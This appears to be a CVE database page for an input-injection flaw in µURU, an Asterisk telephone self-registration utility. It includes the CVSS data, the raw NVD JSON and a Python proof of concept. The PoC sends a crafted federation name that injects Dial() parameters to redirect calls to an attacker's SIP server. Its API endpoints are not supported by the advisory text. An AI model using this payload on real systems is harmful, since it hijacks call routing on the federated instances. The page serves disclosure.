Security Vulnerability Report
CVE-2025-69205 CVSS 6.3 MEDIUM

CVE-2025-69205

Published: 2025-12-29 21:15:44
Last Modified: 2026-04-15 00:35:42

Description

Micro Registration Utility (µURU) is a telephone self-registration utility based on Asterisk. In versions up to and including commit 88db9a953f38a3026bcd6816d51c7f3b93c55893, an attacker can craft a special federation name so that characters treated as special by Asterisk are injected into the `Dial()` application, due to improper input validation. This allows an attacker to redirect calls on both of the federating instances. If the attack succeeds, the impact is very high. However, the attack requires that an admin accept the federation request. As of the time of publication, a known patched version of µURU is not available.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

µURU <= commit 88db9a953f38a3026bcd6816d51c7f3b93c55893

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-69205 PoC - µURU Federation Name Injection
# This PoC demonstrates the injection of Asterisk special characters
# into the Dial() application via federation name

import requests
import json

# Target µURU instance
TARGET_URL = "http://target-uru-server:8080"

# Malicious federation name with Asterisk special characters
# The pipe character (|) separates Dial() parameters
# The SIP/ prefix can redirect calls to attacker's server
malicious_federation_name = "attacker|SIP/evil@attacker-server/6001"


def create_federation_request():
    """
    Create a federation request with malicious federation name
    """
    payload = {
        "federation_name": malicious_federation_name,
        "description": "Legitimate federation request",
        "enabled": True
    }

    # The vulnerable endpoint that accepts federation configuration
    endpoint = f"{TARGET_URL}/api/federation/create"

    try:
        response = requests.post(
            endpoint,
            json=payload,
            headers={"Content-Type": "application/json"},
            timeout=10
        )
        print(f"[*] Federation request sent: {response.status_code}")
        return response.json()
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


def trigger_call_redirect():
    """
    Once admin accepts the federation, trigger the vulnerable call path
    """
    endpoint = f"{TARGET_URL}/api/federation/test-call"

    # This will invoke Asterisk Dial() with injected parameters
    payload = {
        "source_federation": "legitimate_server",
        "target_federation": malicious_federation_name
    }

    try:
        response = requests.post(endpoint, json=payload, timeout=10)
        print(f"[*] Call redirect triggered: {response.status_code}")
        return response.json()
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


if __name__ == "__main__":
    print("[*] CVE-2025-69205 PoC for µURU Asterisk Dial Injection")
    print("[*] Target: " + TARGET_URL)
    print("[*] Note: Requires admin to accept federation request")

    # Step 1: Create malicious federation
    create_federation_request()

    # Step 2: Trigger call redirect (after admin approval)
    # trigger_call_redirect()
```

References

https://docs.asterisk.org/Latest_API/API_Documentation/Dialplan_Applications/Dial
https://github.com/olell/uURU/security/advisories/GHSA-xvrh-pm3f-79v4

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-69205",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-29T21:15:43.667",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Micro Registration Utility (µURU) is a telephone self registration utility based on asterisk. In versions up to and including commit 88db9a953f38a3026bcd6816d51c7f3b93c55893, an attacker can crafts a special federation name and characters treated special by asterisk can be injected into the `Dial( )` application due to improper input validation. This allows an attacker to redirect calls on both of the federating instances. If the attack succeeds, the impact is very high. However, the requires that an admin accept the federation requests. As of time of publication, a known patched version of µURU is not available."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.3,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-20" },
          { "lang": "en", "value": "CWE-74" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.asterisk.org/Latest_API/API_Documentation/Dialplan_Applications/Dial",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/olell/uURU/security/advisories/GHSA-xvrh-pm3f-79v4",
        "source": "[email protected]"
      }
    ]
  }
}
```